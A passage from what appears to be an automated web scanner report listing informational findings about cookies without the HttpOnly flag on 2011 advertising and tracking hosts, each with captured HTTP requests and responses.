The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.83. http://pix04.revsci.net/J06575/a4/0/0/pcx.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/J06575/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPNcEPF7gMQFmJWL/bIkVOGmUWyin9f4qPlqVyo9gAwLzNdWsobEQsSoI7bJcXf99+4jWR4Dlls5n9FBzORIioqvrBy6Fm6ao1z467/rY3cyf1F0Qb/zZOSoe+8Rsne2QXDMcCDc0xGZ8Qy3gbow6eZ6r/AoSRkOii3Em8CTaj7ZKHmv8gw9McWyGxb/IoIyQU=; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:26:12 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNcEPF7gMQFmJWL/bIkVOGmUWyin9f4qPlqVyo9gAwLzNdWsobEQsSoI7bJcXf99+4jWR4Dlls5n9FBzORIioqvrBy6Fm6ao1z467/rY3cyf1F0Qb/zZOSoe+8Rsne2QXDMcCDc0xGZ8Qy3gbow6eZ6r/AoSRkOii3Em8CTaj7ZKHmv8gw9McWyGxb/IoIyQU=; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:26:12 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:26:11 GMT
Content-Length: 671

/* Vermont 12.4.0-1242 (2011-05-12 08:25:50 UTC) */
rsinetsegs=[];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z]{3
...[SNIP]...

16.84. http://pix04.revsci.net/J06575/b3/0/3/1003161/817295946.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/J06575/b3/0/3/1003161/817295946.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFOUnFbnIQVp3RUOz/VGQbp+XT5PhqGi77X3Z4RpparcWHKeV86Lli0TAjp7sD2wsNjeiiHejHOOvj0jdLCjKDn6QOlaUki40+l7YGOxttCDhojwZFfSdbSG6auv+NtQaLeK6yjaSOcn/tIVqutnj5ehklArgmMZQWDPA+LFxsMUIfDd8xp54waV696ckFp0yQyokMqd9T2L+UDYdqcGpMN/s2So1wlKDU/Revqkw6Wg==; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:26:15 GMT; Path=/
NETSEGS_G07608=82f4957c1a652091&G07608&0&4df56737&4&10004,10009,10016,10017&4dcf3a10&1f1a384c105a2f365a2b2d6af5f27c36; Domain=.revsci.net; Expires=Mon, 13-Jun-2011 01:26:15 GMT; Path=/
rtc_ErQC=MLuBq44HAVpDE1RBdcKRB7ZxEIAJXzMpNIiX6/DkPUHnRwu1INU7YESuLkV5mBhoj5Zf1jUufJX42H6lKalhpctVQdkk4LWk10paZnCbr7pphQVva5XAHuMOfH7hyPpHBVYDsCDk9EsrB0ZgEAryJ99wLm75fG8zGQ5teImxCmKodBhXEA8k31zoz1YZt65mkSjxQo3twQuAEERdUBJzh5UdZw6wo7xveqZ3lm3WEmujdRpphTE3a9snWeE7MQjvo/mrpri5/KWuJu3royXntZOFYaAOqPyMa1fhvwito9Fk4RzmKcPrO+rku7aj4KKnIu78UXRDpm9lVsN+mg==; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:26:15 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.85. http://pixel.33across.com/ps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.33across.com
Path:	/ps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

33x_ps=u%3D7836807683%3As1%3D1305398110461%3Ats%3D1305398110461; Domain=.33across.com; Expires=Tue, 15-May-2012 01:29:35 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.86. http://pixel.invitemedia.com/data_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/data_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

dp_rec="{\"3\": 1305509220+ \"2\": 1305508826}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 01:27:00 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.87. http://pixel.mathtag.com/event/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/event/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ts=1305510050; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:40:50 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.88. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=ENQBWwHgBoHyDhmtEqlQq8GBuGECniAAEIqhehgQc4EXMMs4H1cgMFgbEGCoNa_yEQA; expires=Sat, 13-Aug-2011 21:31:35 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.89. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=5671%3D1; expires=Wed, 15-Jun-2011 01:19:53 GMT; path=/; domain=.rubiconproject.com
rpx=5671%3D11993%2C0%2C2%2C%2C; expires=Wed, 15-Jun-2011 01:19:53 GMT; path=/; domain=.pixel.rubiconproject.com
put_2081=AG-00000001389358554; expires=Wed, 15-Jun-2011 01:19:53 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.90. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=5671%3D1%264212%3D1; expires=Wed, 15-Jun-2011 01:26:19 GMT; path=/; domain=.rubiconproject.com
rpx=5671%3D11993%2C0%2C1%2C%2C%264212%3D11993%2C0%2C2%2C%2C; expires=Wed, 15-Jun-2011 01:26:19 GMT; path=/; domain=.pixel.rubiconproject.com
put_1185=4325897289836481830; expires=Fri, 15-Jul-2011 01:26:19 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.91. http://r.openx.net/set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; expires=Wed, 15-May-2013 01:26:09 GMT; path=/; domain=.openx.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.92. http://r.turn.com/r/bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/bd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:26:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.93. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=4325897289836481830; Domain=.turn.com; Expires=Fri, 11-Nov-2011 20:26:57 GMT; Path=/
pf=_fnFNfxp6XXik7nKu4JYZXvBE_lJcdumADu2POSRW-K5QG0T3QdNjoLPr0l2V7ELxe7lCMMXT0t9dxMKVzXHibDu0nk6ZTWCqQw2ls2jDUXOWLK9LcPGmShBm337QwSVEHzKXHq15ooP7FoZYLBJ5WdZ3kW7KFyw4Yua0NKdSC6x49DR9xNu-8EqcBJ8MiPRFWemUI9n3OLgXGmu3F70XLnXcQqmi33jxb-IIKkZs6gPsjBgp0yvPG-lT8pkb3Wd; Domain=.turn.com; Expires=Fri, 11-Nov-2011 20:26:57 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Fri, 11-Nov-2011 20:26:57 GMT; Path=/
Set-Cookie: pf=_fnFNfxp6XXik7nKu4JYZXvBE_lJcdumADu2POSRW-K5QG0T3QdNjoLPr0l2V7ELxe7lCMMXT0t9dxMKVzXHibDu0nk6ZTWCqQw2ls2jDUXOWLK9LcPGmShBm337QwSVEHzKXHq15ooP7FoZYLBJ5WdZ3kW7KFyw4Yua0NKdSC6x49DR9xNu-8EqcBJ8MiPRFWemUI9n3OLgXGmu3F70XLnXcQqmi33jxb-IIKkZs6gPsjBgp0yvPG-lT8pkb3Wd; Domain=.turn.com; Expires=Fri, 11-Nov-2011 20:26:57 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 15 May 2011 20:26:57 GMT

GIF89a.............!.......,...........D..;

16.94. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/iqAJF previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/du/id/L21rdC8xL21jaHBpZC85/rnd/iqAJF

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:58 GMT; Path=/
rrs=1002%7C1; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:58 GMT; Path=/
rds=15110%7C15110; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:58 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.95. http://r.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:22:28 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:22:28 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:22:27 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=4447746261978249819&fpid=4&nu=n&t=
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=786652/size=728090/u=2/bnum=71920917/hr=20/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Ftravel.usatoday.com%252Fcruises%252Fpost%252F2011%252F05%252Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%252F169725%252F1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=JvH0NFJwHsb0FtfqHjQCiZITi+CCeziRcB; domain=advertising.com; expires=Wed, 15-May-2013 01:20:10 GMT; path=/
F1=Bk8eQ3EBAAAABAAAAEBACCA; domain=advertising.com; expires=Wed, 15-May-2013 01:20:10 GMT; path=/
BASE=x7Q9Mi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqiTY9EZTN3JW20eLPdrgh1P5SsSr6+LbSM!; domain=advertising.com; expires=Wed, 15-May-2013 01:20:10 GMT; path=/
ROLL=U6APIjeKkzEWubpE6Al2BE2iZmDmLrCs2nFCCpOodIr/p+YO855CAlIH6FkTqWZ8dl6Dt86qJxfhU88uP3KlkcN!; domain=advertising.com; expires=Wed, 15-May-2013 01:20:10 GMT; path=/
71920917=_4dd07bc9,3027560310,786652^1007584^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.97. http://sales.liveperson.net/hc/46281118/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/46281118/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HumanClickSiteContainerID_46281118=STANDALONE; path=/hc/46281118

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/46281118/?&site=46281118&cmd=mTagInPage&lpCallId=576137394411-176791957812&protV=20&lpjson=1&page=http%3A//www.petco.com/%3FAID%3D10413444%26PID%3D2537521%26cm_mmc%3DCJ-_-CID-_-2537521-_-10413444&id=5485254339&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sales-petco-english&activePlugin=none&cobrowse=true&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5655530747531728922; LivePersonID=-16101514677756-1305510216:-1:-1:-1:-1; HumanClickSiteContainerID_46281118=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; HumanClickACTIVE=1305510207439

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:44:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_46281118=STANDALONE; path=/hc/46281118
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 01:44:12 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"576137394411-176791957812","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

16.98. http://sales.liveperson.net/hc/53965383/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/53965383/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HumanClickSiteContainerID_53965383=STANDALONE; path=/hc/53965383

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/53965383/?&site=53965383&cmd=mTagInPage&lpCallId=717305964557-990646058227&protV=20&lpjson=1&page=http%3A//www.toshibadirect.com/td/b2c/laptops.to%3Fpage%3DsegHHO&id=1150949404&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-toshiba-english&activePlugin=none&cobrowse=true&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=764357015027527896; LivePersonID=-16101514677756-1305510079:-1:-1:-1:-1; HumanClickSiteContainerID_53965383=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1305510075701

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:41:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_53965383=STANDALONE; path=/hc/53965383
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 01:41:50 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"717305964557-990646058227","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

16.99. http://sales.liveperson.net/hc/71737897/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/71737897/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HumanClickSiteContainerID_71737897=STANDALONE; path=/hc/71737897

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/71737897/?&site=71737897&cmd=mTagUrl&lpCallId=424023586599-361989263330&protV=20&lpjson=1&SV%21impression-query-name=chat-sonystyle-sales-general-english&SV%21impression-query-room=chat-sonystyle-sales-general-english&id=4469883308&info=button-impression%3Achat-sonystyle-sales-general-english%28Sony%20Store%20USA%20%7C%20Sony%20VAIO%AE%20Computers%20%7C%20Sony%20Consumer%20Electronics%29&waitForVisitor=true&d=1305494406469&page=http%3A//sales.liveperson.net/hcp/width/img40.gif HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
Cookie: HumanClickKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; LivePersonID=LP i=16601155425835,d=1302186497

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:20:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 15 May 2011 21:20:08 GMT
Set-Cookie: HumanClickSiteContainerID_71737897=STANDALONE; path=/hc/71737897
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 119

lpConnLib.Process({"ResultSet": {"lpCallId":"424023586599-361989263330","lpCallConfirm":"","lpData":[{"result":40}]}});

16.100. http://secureshopping.mcafee.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:39:49 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D

Response

16.101. http://secureshopping.mcafee.com/css/home.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/css/home.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:24 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/home.css HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:24 GMT
ETag: "CdLEBc9iPjr"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:24 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 1065
Date: Mon, 16 May 2011 01:32:24 GMT

div.card1 {
width: 265px;
height: 128px;
}

div.card2 {
font-size: 11px;
padding-left: 70px;
padding-top: 60px;;
padding-right: 10px;
}

td.catrow {
padding-left: 10p
...[SNIP]...

16.102. http://secureshopping.mcafee.com/css/public.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/css/public.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:40:07 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/public.css?1 HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:40:08 GMT
ETag: "CdLEBc9iQFL"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:40:07 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 3209
Date: Mon, 16 May 2011 01:40:07 GMT

body, td, div, p, th {
font: 12px arial;
color: #333;
text-align: left;
}

#wrapper {
width: 960px;
margin: auto;
text-align: left;
}

a {
color: #336699;
}

a:vis
...[SNIP]...

16.103. http://secureshopping.mcafee.com/images/banner_arrow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/banner_arrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/banner_arrow.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:33 GMT
ETag: "CdLEBc9iPTz"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:32 GMT
Content-Type: image/gif; charset=utf-8
Content-Length: 49
Date: Mon, 16 May 2011 01:32:32 GMT

GIF89a..........fff!.......,..............i...(.;

16.104. http://secureshopping.mcafee.com/images/banner_mfes_signup.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/banner_mfes_signup.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:33 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/banner_mfes_signup.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E73DAF051D3563-4000012900019997[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=22a3c062-a3d0-4f46-9ecc-f8de804c3864&loc=EN-US; IS3_History=0-0-0____; WT_FPC=id=2f472e45fcd89a275f81305366902694:lv=1305366902696:ss=1305366902694; s_nr=1305377702704-New; s_ev8=%5B%5B%27mcafee%27%2C%271305377702705%27%5D%5D; user=id=1305509541690-1-kyqx

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Tue, 17 May 2011 01:32:33 GMT
ETag: "CdLEBc9iT9H"
Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:32:33 GMT
